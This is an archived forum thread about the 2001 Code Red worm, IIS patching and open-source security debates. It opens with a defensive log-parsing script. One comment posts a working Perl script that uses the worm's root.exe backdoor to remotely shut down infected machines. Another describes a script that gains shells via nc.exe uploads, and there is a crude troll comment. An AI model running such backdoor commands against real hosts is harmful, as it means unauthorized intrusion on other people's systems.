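      One way to answer the question above from the Apache side, added here as an example and not code from the original thread or from any poster: parse the access log, classify each default.ida probe as Code Red (the request padded with N characters) or Code Red II (padded with X characters), and count probes per source address so you can see whether a few hosts dominate or it is the usual scatter of compromised machines. The log lines embedded in the block are constructed for the example; the addresses are made up and the %u-encoded payload after the filler is abbreviated, not copied from anyone's real logs.

```python
"""Count Code Red / Code Red II probes per source IP in an Apache access log.

Added example, not from the original Slashdot thread. The sample log lines
are constructed; the addresses are made up and the overflow payload after the
N/X filler is abbreviated.
"""
import re
import sys
from collections import Counter

# Apache common/combined log prefix: ip ident user [time] "METHOD path proto" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Both worms hit the .ida ISAPI filter via /default.ida with a long run of
# filler before the %u-encoded shellcode: 'N' for Code Red, 'X' for Code Red II.
PROBE_RE = re.compile(r'^/default\.ida\?(N+|X+)', re.IGNORECASE)

# Constructed sample log (not real traffic). 10.0.0.7 sends three probes of
# both variants, 172.16.9.3 sends one, 192.168.5.22 is an ordinary visitor.
SAMPLE_LOG = """\
10.0.0.7 - - [05/Aug/2001:03:14:07 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 291
10.0.0.7 - - [05/Aug/2001:03:20:11 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 291
10.0.0.7 - - [05/Aug/2001:03:21:40 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 291
192.168.5.22 - - [05/Aug/2001:03:22:02 -0400] "GET /index.html HTTP/1.1" 200 1043
172.16.9.3 - - [05/Aug/2001:03:25:55 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 291
"""


def classify_probe(path):
    """Return 'codered', 'codered2', or None for a request path."""
    m = PROBE_RE.match(path)
    if not m:
        return None
    return 'codered' if m.group(1)[0].upper() == 'N' else 'codered2'


def summarize(log_lines, threshold=3):
    """Tally default.ida probes per source IP.

    Returns (counts, variants, candidates): probe count per IP, the set of
    worm variants seen from each IP, and the IPs at or above `threshold`.
    Lines that do not parse as Apache log entries are skipped.
    """
    counts = Counter()
    variants = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        kind = classify_probe(m.group('path'))
        if kind is None:
            continue
        ip = m.group('ip')
        counts[ip] += 1
        variants.setdefault(ip, set()).add(kind)
    candidates = sorted(ip for ip, n in counts.items() if n >= threshold)
    return counts, variants, candidates


def report(log_text, threshold=3):
    """Human-readable summary, one line per probing source."""
    counts, variants, candidates = summarize(log_text.splitlines(), threshold)
    lines = []
    for ip, n in counts.most_common():
        tag = ' BLOCK-CANDIDATE' if ip in candidates else ''
        kinds = ','.join(sorted(variants[ip]))
        lines.append(f'{ip:15} {n:4d} probe(s) {kinds}{tag}')
    return '\n'.join(lines)


if __name__ == '__main__':
    # Usage: python codered_log.py [access_log]; without a file, the sample is used.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    print(report(text))
```

      The per-IP tally is mostly for triage: an Apache server is not vulnerable to either worm, and the sources are other people's compromised IIS boxes, which change daily, so blocking them one address at a time buys little. The variant column is the more useful bit, since an X-filled probe tells you the remote machine has the Code Red II backdoor and a patch alone will not clean it, which is worth mentioning when you contact its owner.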

  215. Here is the audio by CTboy · · Score: 1

    This is very funny. The video is nicer, but streaming Windows Media Player is hard to copy. It's an explanation from the IBM guy who invented Ctrl-Alt-Delete explaining why he invented it. The setting is what looks like a TV news interview show. Bill Gates is there too.

    You'll have to rename the file to mp3. It's easier to download stuff from prohosting if the server doesn't recognize it. You understand. :-)

    1. Re:Here is the audio by subsolar2 · · Score: 1
      Well thank ye, that was rather funny. :^)

  216. Re:Not the mess they made... by rambot · · Score: 1

    M$ needs to build into IIS an automatic update utility that can not be easily turned off. Oops, that won't work... then we would have an internet traffic jam of a different kind. Seriously though. Then, if the admin was smart enough to turn it off, they would hence self-qualify as competent enough to run IIS unsupervised.

  217. Re:FUD ALERT by clare-ents · · Score: 2

    "
    Any good admin would have important data backed up prior to installing.
    "

    How do you back up the IIS settings on NT 4?

    Answer - you can't.

    --
    Only two things are infinite, the universe and human stupidity, and I'm not sure about the former. (Einstein)
  218. Re:How do you run these scripts by Dwaine+Garden · · Score: 1

    Could someone please explain how to run these scripts? I have been at it for a week. running perl redcode.pl does not work. Anyone?

  219. IIS go bye-bye by alexburke · · Score: 2

    it also gives you an option to permanantly disable IIS

    Red Hat must be pleased that Microsoft is now bundling the Red Hat installer with their newest patch...

  220. Re:MS Tool by well_jung · · Score: 1
    What's not amazing is that you'd need to reboot your servers ;)

    --
    Carl G. Jung
    --
    "With one breath, with one flow, You will know Synchronicity" -La Policia
  221. Re:Not the mess they made... by mikethegeek · · Score: 4, Insightful

    "It's the mess left by lazy admins who can't be bothered with security patches a month before a worm comes out to exploit them. Shame on the NT admins."

    Does this really surprise anyone? MCSE's are trained (and tested) to solve everything by "reboot, reload, reinstall", because Microsoft's way is to "take the easy way out" instead of actually FIXING the problem.

    And, since so many MS service packs BREAK servers and software when installed, can you also not blame people for NOT rushing to install them? Even where I work, where we do OS compatibility testing on servers, we don't start using new MS service packs until they've been tested and found safe by our internal test group...

    I for one expect use of IIS to drop as a consequence of the Code Red virus... Were IIS open source, these holes and backdoors would have been seen LONG ago and fixed. Apache runs MUCH more of the web than does IIS, yet you don't see anywhere near the number of bugs, exploits and DOS worms as does IIS.

    --
    === The price of freedom is eternal vigilance
  222. Here's how open source would be better... by mikemulvaney · · Score: 3, Insightful
    Microsoft fixed the problem before there was a problem. I don't see how Open Source would be any better in this regard.

    It's true that Microsoft put out a patch before the virus took off, so that's a good thing. But Microsoft releases patches all the time, and that is a bad thing. I'm on the security mailing list from MS, and I get at least 3 or 4 alerts a week. I'm also on the Slackware list, and I have received 3 or 4 alerts in the last six months.

    The reason for this is because Open Source projects tend to fix their security bugs before they are released. If Apache shipped with something that allowed this kind of remote exploit in one of the 2.0 betas, there is a better chance that someone else out there will see it. What is the chance that someone can do an independent security audit of Windows XP?

    Closed source can be perfectly good at closing holes, if the company is as big as Microsoft. But Open Source is much better at closing those holes before they are shipped: many eyeballs make all bugs shallow. Open Source doesn't catch every bug, of course; but enough are found that when the odd hole is announced, it is a big enough deal that the patches are more likely to be installed.

    Closed Source hurts Microsoft security in more ways than one. Not only are all default installations compromised, but since so many new patches come out every week most admins don't keep up with them. While this is partially the admin's fault, it is also the fault of the software model that prevents these problems from being found quickly.

    -Mike

    PS: how do we know that "Microsoft fixed the problem before there was a problem", anyway? The patch came out before this big worm hit, but how many servers were quietly compromised in the last year?

    1. Re:Here's how open source would be better... by reflective+recursion · · Score: 1
      Can you point to a single thing I said that shows that I "forgot" this one important detail??
      By assuming that source code makes everything better. It is simply not a matter of having source code available that makes it secure. Grandma sitting at home does not know how to patch source code and recompile. Unless she has something like Windows Update it ain't gonna happen (though I believe Ximian has something akin to this; either way it's irrelevant to the issue).

      You still have not commented on sendmail (I noticed you used the less exploited qmail). Sendmail has been exploited numerous times. I believe it proves source code available does not make for inherently secure software. The issue is really this: bugs are in every program. They are in source code that has been released. If a cracker wanted to they surely could find an exploit in some open source server software. There is no way to prove software is secure. I'm not debating whether proprietary makes securer software. I'm saying open source does not inherently make software more secure. Both ways of producing software can produce secure software. IIS is now a secure product up until the next cracker figures a way to break it. This is the same way it has been for Linux, though not a big deal because Linux has always been used in smaller proportion to Windows.
      My reason for posting what I did was not to convince you, it was to counter the propaganda you posted, so others may realize there are other views, may consider the various sources for those views, and do the research, or at least the thinking, for themselves. To meet that goal, I need not back up everything I say, any more than you did in your claims about the security of proprietary software as a model, or in any of its specific forms.
      It may be propaganda, but as far as I'm concerned it is the truth. You do have to back up your claim because the original poster implied (if not outright claimed) that open source produced software that was more secure than proprietary. There needs to be hard evidence to back that up, because my view is 100% neutral. Proprietary software could very well be insecure garbage in every possible case compared to open source software that has the same functionality. But I do need to see sources for that kind of implication.
      If they're "ignorant end-users", why is Microsoft letting them run a web server on a hostile network, allowing their systems to become launching-pads for further hostile actions against other systems? My point is that Microsoft exerts vastly more control over the computing environment of Microsoft users (and willfully so) than any combination of GNU/Linux/*BSD/CPAN authors do over the computing environment of their users
      For the same reason Ford "lets" people drive drunk? It's the government's job to protect people from each other--not Microsoft's. Microsoft was not expecting a bug in their IIS server anyways. It was not a wrongdoing on their part. The only reason Microsoft has "control" of users is because of ignorance of what they are doing. I'm sure they can disable or choose not to install IIS (or generally configure their system correctly). IIRC IIS was originally the Microsoft Personal Web Server, which was just a small web server intended for private (i.e. homepage) use. It is ignorance on the users' part to not check for fixes to their software and properly maintain their computer. Using the automobile analogy again, if people who drive Ford Explorers never took their vehicle in for the tire recall then they have no way to claim Firestone did them wrong if an accident occurs (and most likely any court would side with Ford/Firestone if this were the case).
      In other words, when the software you paid for the privilege of using , but not studying or improving, fails, you have to not only buy some next-generation form of that software, but newer computers to run it?
      Why not? If something breaks in your computer there are times you will have to upgrade a number of components. It could be worse. I'm sure you have heard the stories of programs back in the good ole days even causing fires in the hardware (back when all source was "open").
      The answer is: of course that's true, for proprietary software. That's why, of the reasonably high number of 486 CPUs out there running in production mode as mail and web servers, a vanishing percentage, I suspect, run proprietary software for those apps -- instead, they probably run a Linux or *BSD kernel, Apache, qmail, etc.
      So you are saying lets not innovate? Lets keep backwards compatibility? Lets stick with 30-year-old designs?
      That is, they punished the company that produced a largely-Y2K-compliant system and rewarded the one that boxed them into a corner by creating Y2K-buggy software for years. That's exactly the kind of perverse result one would expect from depending on obscurity rather than openness.
      I know the feeling. Right now Linux is making me use antiquated software when I could be using WindowsNT, but I digress (*joke*.. I do like free software (GNU-sense) and Linux, but the truth is it is a very old design. That can not be argued as FUD).
      I claim your posts contained much more, and largely uninformed or gratuitous, genuine bashing of free software than mine did of Microsoft.
      I'm not bashing free software. I'm sick of Slashdot readers with their holier-than-thou attitude spreading FUD about proprietary software. It can go both ways.
      Your arrogance is really over the top. I, of course, have worked for many proprietary-software developers, none of them Microsoft, but can't help noticing which one has survived and flourished as what most people think of as the source of software enabling them to access the Internet.
      Okay, I'll give you that one. I'm not trying to sound harsh or have an attitude. I think many people who use Microsoft day-to-day (as a tool, not for enjoyment of computing) would say "Microsoft makes some great products." I believe they do (but I sure don't use anything other than Win98.. and it is a total POS for me). I've heard a few people claim Win2k is the greatest thing that ever happened to their computer (or something to that extent). Hey, if it works for them I can't complain (though Code Red did piss me off a little, I would definitely not blame Microsoft. It could easily happen with open source in the future as I have seen a great deal of ignorant Linux/BSD users.. especially on Slashdot).
      And while I agree that free software isn't, at the level of instantiation (that is, instances of free software), inherently more secure than proprietary, I do claim that it's inherently more secure as a model for software development and deployment. Further, my impression (definitely devoid of necessary research to support it) is that, in the free-software community, well-designed, secure software is a much better predictor of deployment, especially over the long term. Look at how "poorly" qmail is "marketed", yet its installed base is pretty amazing.
      I believe people creating open source care more about the quality at times than proprietary vendors. People writing free software do so in their own time, and mostly as a hobby. That is a far cry from denouncing all proprietary software as insecure based on just one vendor (MS).
      Name one. Name one that you can show is secure, in a public forum, by reviewing the most important material that should come into evidence: the source code!
      That, in itself, is the problem. You can not prove beyond a shadow of doubt that the source code you have in your hand (drive, whatever) is 100% secure. I don't recall the early web browsers having huge security issues (or early BBS software for that matter). I am positive they had bugs that the programmers never knew existed. If you accept the fact that any piece of software has at least one bug at any given time then it is clear that, open source or not, no software is secure. I think the matter is trust. You seem to not trust proprietary vendors, and I do think this has much to do with Microsoft's behavior (and their negative image). I have learned to trust Microsoft enough to get things right a good amount of time, but not enough that I personally would use their software (if I tried Win2k I may even be back to MS, if it really is as good as some claim). I seriously hope you do not go around looking at the source code for the Linux system to find flaws. You must surely trust the coders to do a good job, right? It would take many man-years (decades?) to examine and audit the free software on your typical Linux/BSD/etc. box. There may be a large number of open source coders, but keep in mind they do code on usually one or two programs at a max. If you take into consideration the large number of Linux programs then the "eye-count" becomes diminished quickly.
      Ultimately, you believe that security through obscurity, in the form of not only obscuring algorithms, but obscuring the fact that proprietary-software developers have a form of relationship with their customer base that cannot , even under the best of circumstances, be described as "demonstrably committed to mutual security", is the best solution. [snip] Proprietary-software developers do exist that provide some degree of commitment to the security of their customers' installations, but that commitment is, in my experience, "earned" via distinct payments and other consideration, compared to the software they sell. That is, the mere act of acquiring and deploying proprietary software rarely earns a customer any useful commitment from the vendor regarding security. The same goes for free software, in spades, of course, but with free software the customer has not only the original vendor to go to to purchase additional security commitments, but pretty much anyone else in the world, since he has access to the source code, to open forums for discussing its security, and to source-level patches to improve and/or test that security.)
      I agree with that point. I believe what will eventually (and already to an extent) happen is proprietary software will move to a strategy as Troll Tech attempted. If the company shall go under (or product is removed from their maintenance, catalog, whatever) it would be released freely (under GPL or somesuch). And there would be a guarantee (in the EULA or what have you) that this would happen. It would benefit proprietary vendors by giving them something they can actually make a profit on, while giving trust to the users incase they should go under (I know, I know.. free software can make money by selling support, but this is capitalism. Make as much money as you can, right? Which leads to more ignorance; users aren't aware that cheaper alternatives exist. In many cases, users really do not care whether they pay extra or not. They just want the computer to "do as I say").
      After all, it isn't the free-software development community that pushes for things like the DMCA, is it?
      I don't know enough about DMCA, honestly. It may very well be a good idea gone wrong. Then again, it could be about greedy software vendors wanting their way. I'd hope not, but it could be the case.
      --
      Dijkstra Considered Dead
    2. Re:Here's how open source would be better... by sheldon · · Score: 2

      It sounds as though Slackware doesn't provide very good support. If you check RedHat, they issue about 5-6 security patches a month, on average for their Linux distribution.

      I count 20 out on their site for RedHat 7.1 since April of this year.

      I use that one as an example, but I suspect if you studied the realm of what ships with RedHat you would find many items would qualify as beta releases, or are projects that are in a constant state of beta.

      Apache takes the attitude of shipping a very minimal set of tools. The problems are seldom in Apache, they are in all the third party add-ins.

      Microsoft's IIS is a very featureful suite of utilities that includes much more than a web server. It's not surprising at all that it has more bugs than the spartan Apache.

  223. Re:Start blaming Microsoft again by Anonymous Coward · · Score: 0

    Duh, this worm affects everyone on the internet. That's why we blame Microsoft. If it didn't affect us we wouldn't care much.

  224. Re:The $64K question: Does it actually work? by psychalgia · · Score: 2, Informative

    The patch worked; it cleared my server of any problems, but it did report failing to complete. Either way I can no longer "get root" via a web server, and www.securityspace.com reports I'm clean. Now I just sit and wait for the next one! (Actually, compound this with the fact that my entire company depends on RHYTHMS, and it has been an EXCITING week.)

    --

    ________________________________________________

  225. Re:CI Host sucks rocks by alexburke · · Score: 1

    Email me. I might have a solution for you.

  226. Re:Warhol Worm proposed: 15 minutes to total infec by Rubik+Penguin · · Score: 2, Insightful

    This is spot on. Changeover to IPv6 (with its larger address space) would have stopped Code Red before it even started. A worm would take years on IPv6 to find another host to infect. IPv6 would put an end to random port scanning too.

  227. Re:FUD ALERT by Patrick+McRotch · · Score: 0, Troll

    Funny, I've never been paranoid about installing/patching anything, regardless of the operating system. It seems to me that a GOOD ADMIN would have any important data backed up prior to installing/upgrading any mission critical servers. Just because you're a negligent moron doesn't mean that Windows sucks.

  228. Slowlaris? Wooden door with rotten hinges? by Anonymous Coward · · Score: 0

    Slowlaris is the least secure UNIX I've ever met. Starting from a default installation you have to install a 20 meg patch bundle before you can even start thinking about hardening the system.

  229. Re:Not the mess they made... by mpe · · Score: 2

    A computer is a tool. You have to learn how to use it properly. Do you go around demanding that 747s be made so easy to fly that every office worker could do it?

    Also a pilot isn't going to be maintaining the aircraft. Certainly they can't use the controls in the cockpit to change the engines or such like...

  230. Re:What if by Anonymous Coward · · Score: 0

    I would blame Red Hat for making an insecure product.

    In today's environment, *any* server should install with NO services running, say so, and have a straightforward procedure for enabling the ones desired by the admin/owner. To do otherwise is to encourage insecure servers.

  231. Re:Next step: automate it! by serial+frame · · Score: 1
    Okay, fine, it's not in perl (bash, actually), but I wrote a slew of scripts for firing at people that appear in my logs (of course, nothing was really done other than enjoying seeing their cmd.exe).

    hackiis (gain a shell, w00t!)

    execmd (Run a command)

    my default.ida (give the NT/2k slackers a good show)

    Not much explanation is needed for hackiis, other than the fact that it probes a given host for the Unicode directory traversal weakness, checks for root.exe, checks for nc.exe, uploads it from a given FTP server, and gains a shell. (Please edit hackiis.) My default.ida will attempt to point whoever views it to goatse.cx (change it if ya want, I couldn't think of anything else, hehe). Also change the $log variable to match your setup.

    For some, it has a high lameness factor, but after several days of seeing my logs grow past the 1MB mark, I felt like taking advantage of it. Malicious? Not in my book. But highly entertaining in a sick, twisted way.

    --

    -
    And the Angel said unto me, "These are the cries of the carrots! The cries of the carrots!"
  232. I don't think this is funny... by drnomad · · Score: 0, Redundant
    I clicked on that "link" and it seems that it tries to shutdown your PC.

    Fortunately, I'm using Linux, but what if I was a Win user, having some files opened? Clicking that link (I'm only asking for a warning, please) would make me lose some precious work.

    Michael, please add a warning about what that link actually does; now my machine was tested while I didn't even know upfront what was going to happen. Yes, I know, if I were infected, I'd be unhappy too, but please show some understanding.

  233. Re:Liability for software defects by ZxCv · · Score: 2, Insightful

    I highly doubt software makers will ever be held liable...

    Particularly in the x86 market, there is such an abundance of 3rd party hardware that goes into most systems. This usually means 3rd party drivers. And because these all have to work together, who's to say that it wasn't a bug in Windows that caused that video driver to fail? Or was it a bug in the driver itself? Who is to be held liable here?

    I don't think it is such a stretch to say that some software makers could (and maybe should) be held liable for their software. Such as in the case of the over-radiation that caused deaths. Last I checked, I didn't see the IIS bug causing anyone to croak and that last BSOD didn't give me any serious medical problems either. If traditional PC software makers were held liable for their software, the PC software market would simply collapse. And beyond that, the few companies left that could afford the added costs of this liability would be left to charge outrageously high prices for the software that they were able to sell.

    So, at first, this maybe sounds like not such a bad idea. But after thinking about it, I'd definitely be against it (for the most part).

    --

    Perl - $Just @when->$you ${thought} s/yn/tax/ &couldn\'t %get $worse;
  234. Re:Script doesn't work anyways by nick-less · · Score: 1

    Works in what way? If you mean it sends the HTTP request, then yeah, that probably does work. But it's not gonna shut down IIS.

    It's like GC said in another thread here: it depends on the specific setup of the infected machine. There is no common way to shut it down. Bothering the admin with mails seems to be the only way. But those forgotten machines buried behind walls will annoy us forever..

  235. Re:Not the mess they made... by malfunct · · Score: 1
    His point is that the patch was available and public BEFORE Code Red. Meaning that MS found the vulnerability and issued a fix for it and no one used it. That happens no matter what OS you run; if you don't keep it up to date you get hosed by bugs. In this case MS did as well as anyone could to fix the problem.

    You people want to ask for all software to be perfect before it's released, but you know what, that doesn't happen. In the OSS world you can just keep the software in forever-beta, but in the commercial world you have to eventually go "I hafta ship this, it's really pretty good" or you go broke. Linux has security holes, they send out patches all the freaking time; if you don't install the patch, is that the Linux community's fault?

    On a similar note, the only reason I think that worms like this are written for Windows more often than Unix (because I am CERTAIN that you could set up a worm to exploit Apache/Unix if you set your mind to it) is that there are just more Windows users to exploit, so it spreads faster and makes bigger news, and anyway the people that write these viruses buy into the popular hacker hype that Windows sucks.

    --

    "You can now flame me, I am full of love,"

  236. Re:Not the mess they made... by ZxCv · · Score: 1

    IIS is not installed by default on W2K Pro. Therefore, whoever was responsible for installing your workstations is responsible for the fact that they are running IIS when they should not be. Granted, it is not the users' faults, but it is no more MS's fault because it was happening on workstations that it shouldn't have been.

    --

    Perl - $Just @when->$you ${thought} s/yn/tax/ &couldn\'t %get $worse;
  237. Re:Next step: automate it! by Anonymous Coward · · Score: 0

    Code Red Vigilante does this. Check out http://www.dynwebdev.com/codered/.

  238. Re:I would like to have sex with a teenage girl. by Anonymous Coward · · Score: 0

    Me too....18 will work just fine...moron

  239. Re:If you've had a corporate hit on your network.. by GC · · Score: 2

    Yes,

    Those machines have probably been patched since infection, but have not been cleaned. The patch does not disinfect Code Red from the machine; a lot of web admins don't realise this.

    I have found vulnerable machines with this tool. I'm also wondering if unpatched infected machines show up with it - as Code Red prevents re-infections by its own code.

  240. Re:Not the mess they made... by Fishstick · · Score: 2

    You are quite right, and I didn't mean to imply otherwise. This is in fact a problem with the group that supplies the PCs to the various departments. They have a process where they "ghost" pre-configured drive images. For some reason, they use a standard development image, which includes a running IIS5 config, on _all_ machines, even those used by the secretarial staff. Go figure.

    But you are right, this isn't as much MS's fault as the bonehead admin that set up the default machine configs.

    --

    There is much cruelty in the universe, John.
    Yeah, we seem to have the tour map.

  241. Good alternative script by Anthony+Kilna · · Score: 1

    #!/usr/bin/perl -w

    # Authored by Anthony Kilna (anthony@kilna.com) Licensed under GPL

    # Change these variables to taste...

    # 1 or 0 depending on whether you'd like to shut down NT entirely or just IIS
    $full_shutdown = 1;

    # 1 or 0 depending on whether you want to spoof a http 404 status code
    $spoof_404 = 1;

    # The location of a file that will be served up (if you're 404-ing this should
    # look like a typical 404 message from your server for the file /default.ida)
    $file = '/www/404.html';

    use LWP::UserAgent;
    use HTTP::Request;

    # Make the HTTP header
    if ($spoof_404) {
        print "Status: 404 Not Found\n";
    }
    print "Content-type: text/html\n\n";

    # Output the file to the browser
    if (open FILE, $file) {
        while (<FILE>) { print $_; }
        close FILE;
    }

    # Makes it so the browser/virus isn't waiting for the outgoing request below
    close STDOUT;

    $server = $ENV{'REMOTE_ADDR'};
    $rooturl = "http://$server/scripts/root.exe";
    $connection = new LWP::UserAgent;
    # Look like we're a real browser (ha!)
    $connection->agent("Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)");

    if ($full_shutdown) {
        # Attempt to shut down NT
        $command = '/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5';
    }
    else {
        # Attempt to shut down IIS
        $command = '/c+iisreset+/stop';
    }

    # Make the request
    $response = $connection->request(new HTTP::Request GET=>"$rooturl?$command");

    # See if it worked, if so report to the web server's log file
    if ($response->is_success) {
        if ($full_shutdown) {
            print STDERR "Code red NT shutdown on $server\n";
        }
        else {
            print STDERR "Code red IIS shutdown on $server\n";
        }
    }

    --
    s/[BW]ill(y|iam)?( H\.?)?( G(ate|8)(s|z))?(,? ?v?(III|3)(\.\D)?)?/Girly-man/gi
  242. Shuts down only DANGEROUS machines by leonbrooks · · Score: 2

    This is like selling a shotgun that only fires when pointed at another weapon that is pointed at it, and cannot be modified to do anything else.

    However, many people will (as you have done) only see that ``it is a shotgun'' (and panic), not that it is totally harmless except as used against armed attackers! This is important because some drooling idiots will now conclude, ``it's OK to sell shotguns because SlashDot has done it already''.

    --
    Got time? Spend some of it coding or testing
  243. Re:Script Error by Anonymous Coward · · Score: 0

    Call me naive, but isn't it also a problem that the script wants to shut down IIS and THEN issue a command through the infected IIS to shut down the computer??

  244. Blame Canada! by rasjani · · Score: 2, Funny

    I'm coordinating Programmers Against Canada. Anyone want to join? Everyone who joins gets an official P.A.C-MAN membership card =))

    --
    yush
  245. So I get to sue Linux? by sheldon · · Score: 2

    Now that's an interesting quandary. LLCs were set up to protect shareholders from liability claims against the company. So I as a developer for software at Acme Corp cannot be legally held liable, myself, for the software I created while working for the company.

    But Acme Corp can. Hell if it's bad enough, they'll get sued to high heaven and go bankrupt. Then I can just go find another job.

    But what corporation protects Linux? If there's a fault in the Linux kernel which causes something bad to happen... Who do I sue?

    Are Linus Torvalds and Alan Cox protected by an LLC? Or do I just sue them personally?

    Now you enter into the world of politics. How do you write a law which damages your adversaries, while protecting your friends?

    Then the question comes in. What exact purpose does this serve to our society? Will software get better, or will there just be less of it? Especially in light of the fact that you mentioned indirect uses of software, such as AT&T.

    It's very easy for people like Bruce Schneier to talk about this because they don't actually write and sell software.

    I'll be impressed when you get Larry Ellison or Scott McNealy up there saying it's a good idea. I'll be really impressed when you get Bill Gates.

  246. Re:Not the mess they made... by Nater · · Score: 2, Insightful

    Microsoft fixed the problem before there was a problem.

    I disagree. Code Red is not the problem, it is the symptom. If Microsoft had fixed the problem before there was a problem, then the buggy version of IIS never would have shipped.

    --

    I like to play children's songs in minor keys.
    "We're all sons of bitches now." --J. Robert Oppenheimer

  247. CI Host sucks rocks by The+Big+Bopper · · Score: 3, Informative

    My domain is on a shared Linux host at CI Host. For over one week now, starting August 2, my domain has been totally useless to me. I couldn't log in to update my content. I couldn't receive email on the domain POP3 box. I couldn't log in with a POP3 client to download any mail that did sneak through. All this went on for over a week. I would call up on the phone and stay on hold forever... a couple of times I would get clueless technicians that would just say "It's the Code Red virus... our administrators are aware of the problem and will have it fixed as soon as possible". OK, I gave them some time to get it fixed because half the internet was having problems with this. But then I noticed everyone else was getting better, and CI Host was still down (except their own www.cihost.com site, which was still aggressively selling service to new customers). I would open up online trouble tickets with them, only to have them get closed without resolution. I re-opened and escalated a couple of times and finally early this morning they took my server down to perform some kind of unknown maintenance and when it came back up it was running better than it EVER had before in the 2+ years I've been with them.

    If anyone is thinking of using CI Host, let me tell you THEY SUCK. About twice a year something major like this happens where I'm down for a week or more. In December of 1999 I went down for almost a whole month (their press releases will tell you it was a much shorter time than this but that is BULLSHIT).

    I'm looking at maybe switching to PrimeMaster Online (http://www.primemaster.com). Anyone here have experience with them?

    1. Re:CI Host sucks rocks by Micah · · Score: 2

      Yikes, I just about used those guys. Then I found www.bchosting.com and have been fairly happy with them so far....

    2. Re:CI Host sucks rocks by robogun · · Score: 1

      I have been using host4me linux box for two years. Virtual acct with 450mb. Uptime 98% (but they ACTUALLY backup) and real customer service. Check out server4me if you want a colo BSD box at $99/mo. You have to admin the box yourself, tho. One IP, 8 gig disk. Mine has been up since September w/ no interruptions.

    3. Re:CI Host sucks rocks by sheeler · · Score: 1

      I use FutureQuest as a web host, and have been with them for over two years. Their service is extremely responsive, and their uptime is incredible. I recommend that you check out their Support/Discussion forums so that you can see for yourself. You will be amazed.

    4. Re:CI Host sucks rocks by cliffjumper222 · · Score: 1

      I use CIHost because they're dirt cheap. I didn't like it when they took away lynx ("due to the load it places on the system") but they're just a temporary service for me until I scrape together the real pennies. Apparently they were blocking IP address spaces on their routers. I couldn't get in from home but work was fine. I fully expect them to complain when my web site starts really getting hit even though they supposedly offer unlimited bandwidth... yeah right!

  248. Re:Not the mess they made... by pa-guy · · Score: 0
    I know that this has been said before, but when I see this kind of crap I have to respond. Most of the infected boxen are not run by companies etc. My logs show mostly home users who probably don't even know that they are running IIS.

    I'm not an MCSE, and I don't use the M$ products, but I'm willing to bet that most NT/2000 admins have patched already. I'm sure this will get modded down, because some crack-smoking moderator has already modded the parent up.

  249. Re:Not the mess they made... by psychalgia · · Score: 1
    except for when we applied sp2 to win2k professional and it corrupted the whole flipping drive. Am I supposed to do this to my webservers w/out taking some time and reviewing the cause?

    either way, we're migrating to LinUx, hopefully before the next breach

    as much talk as i hear though, this could have just as easily been LinUx that got backdoored and if it was, it probably would have gotten a LOT more attention, even threatened the existence of the OS itself, so CHILL OUT.

    --

    ________________________________________________

  250. FOR AN A+... by Anonymous Coward · · Score: 0

    ...don't cut your hair or shave for a year, drink ten cans of Mountain Dew every day and eat only Big Macs, become a homosexual, and move to Cuba. Then you'd be the ULTIMATE open source dood.

  251. You're a bl**dy spoilsport! by leonbrooks · · Score: 2
    Which system did Ramen infect?

    How come despite there being (at the time) three times as many Apache servers up as IIS, there wasn't a shadow of the traffic that CodeRed caused?

    Software has bugs. They get found, they get fixed, move on.

    Don't tell only half a story, and leave out the exciting bits that make it all flow. ``They get found'' seems to have taken, oh... six years, is it now? Why? (1)

    Not only that, breaking Apache (to pick a common example) doesn't automagically get you superuser capabilities. Why not? (2)

    It's been four years now since Apache had a hole this bad, but IIS had them somewhere between monthly and quarterly. Why? (3)

    1. Only Microsoft can see the source, and their programmers generally don't understand security. 2. IIS is design-insecure partly because it takes as many shortcuts as it can to avoid being molasses-slow. Did you know that the Mindcraft benchmarks used FAT instead of NTFS for the same reason? 3. Performance and user friendliness and saleable features are all more important to Microsoft than security or stability.

    --
    Got time? Spend some of it coding or testing
  252. They didn't worry about the lawyers this time... by ZxCv · · Score: 1

    Microsoft admitted 3 months ago that they had a bug and promptly released a patch-- at least a month before Code Red ever surfaced. I highly doubt that they had much problem getting this past their lawyers since the original patch would have already been enough to admit the problem existed. I'm sure this was 100% the result of a PR directive.

    --

    Perl - $Just @when->$you ${thought} s/yn/tax/ &couldn\'t %get $worse;
  253. Re:Unforgivable! by Tony-A · · Score: 1

    If I was running a browser on an IIS machine that that script would shut down, then yes, I would want it to shut my machine down. Probably safer than whatever Microsoft is putting out.

  254. You got it wrong. MCSE's are trained to... by Robber+Baron · · Score: 1

    ...solve everything by Reboot, Re-install, Add RAM!

    --

    You're using her as bait, Master!

  255. Re:Not the mess they made... by easter1916 · · Score: 0

    Yes, I do. The rain IS making me wet.

  256. But this is great for big networks by ZxCv · · Score: 1

    Think of the admin that has to test and de-worm a couple hundred or more machines. Then this tool becomes real nice.

    It also removes some server mappings (which I believe are just registry entries), so while still nothing super difficult, it means everything is much faster than by hand and that the admin didn't have to spend time writing an app that could do all this himself.

    --

    Perl - $Just @when->$you ${thought} s/yn/tax/ &couldn\'t %get $worse;
    1. Re:But this is great for big networks by Lennie · · Score: 1

      Only reason they wrote this is because m$ internal network was infected and it turned out... it's a _lot_ of work getting all those machines patched... we have this now... we might as well throw it into the world.

      --
      New things are always on the horizon
  257. Why no lawsuits? by -tji · · Score: 1
    It seems there are a lot of companies affected by each of Microsoft's gaping holes. They lose data or experience break-ins, but Microsoft keeps humming merrily along producing bad code.

    If this happened to your new car, television, blender, etc. you would demand a refund. If it happened to everyone's new car, there would be a class action lawsuit.

    While I'm no fan of this over-litigious atmosphere in the U.S., at least it does cause corporations to behave with more concern about the quality/safety of their products. Microsoft could use a LARGE DOSE of this. Creating products that NEED an upgrade is part of their business plan, and a disservice to their customers.

